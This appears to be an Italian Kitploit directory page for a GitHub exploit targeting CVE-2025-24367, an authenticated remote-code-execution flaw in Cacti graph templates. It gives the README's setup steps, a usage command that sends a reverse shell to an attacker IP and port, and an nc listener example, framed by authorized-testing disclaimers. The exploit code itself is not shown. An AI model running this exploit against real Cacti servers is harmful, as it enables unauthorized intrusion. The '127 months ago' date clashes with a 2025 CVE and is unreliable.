Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24367 — Exploit di esecuzione remota di codice autenticato per la vulnerabilità del template grafico di Cacti, con payload di reverse shell e supporto proxy per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/shoshinmaster/cve-2025-24367
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubshoshinmaster/cve-2025-24367

CVE-2025-24367

Exploit di esecuzione remota di codice autenticato per la vulnerabilità del template grafico di Cacti, con payload di reverse shell e supporto proxy per test di penetrazione autorizzati.

Vedi Repository
127 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24367 - RCE autenticata nel Graph Template di Cacti

Utilizzo e Sicurezza

Importante — leggi prima questo:
Questo repository e exploit.py sono forniti solo per scopi educativi e di ricerca. Non usare questo codice contro sistemi, reti o servizi per i quali non disponi di esplicita autorizzazione scritta. L'accesso non autorizzato a sistemi informatici è illegale e contrario all'etica. Utilizzando questo codice accetti di rispettare le leggi applicabili e le politiche istituzionali.


Requisiti

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

Utilizzo

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

Esempio

Prima di eseguire lo script assicurati di avere un listener nc in esecuzione. Esegui lo script senza proxy, a meno che tu non stia eseguendo il debug:

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

AVVERTENZE MOLTO IMPORTANTI

  • Non eseguirlo contro sistemi di produzione o su qualsiasi sistema di cui non sei proprietario o per il quale non hai un permesso esplicito di test.
  • Ottieni sempre autorizzazione scritta prima di effettuare test di sicurezza.
  • Utilizza ambienti di laboratorio isolati (ad es. VM, container o reti di test appositamente predisposte) per la sperimentazione.
  • La tua organizzazione potrebbe avere politiche di segnalazione e divulgazione: seguile.
  • Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo codice.

Promemoria finale: Questo script e questo README sono solo per uso didattico. Non usare mai questi strumenti per accedere illegalmente a sistemi.

Scarica lo strumento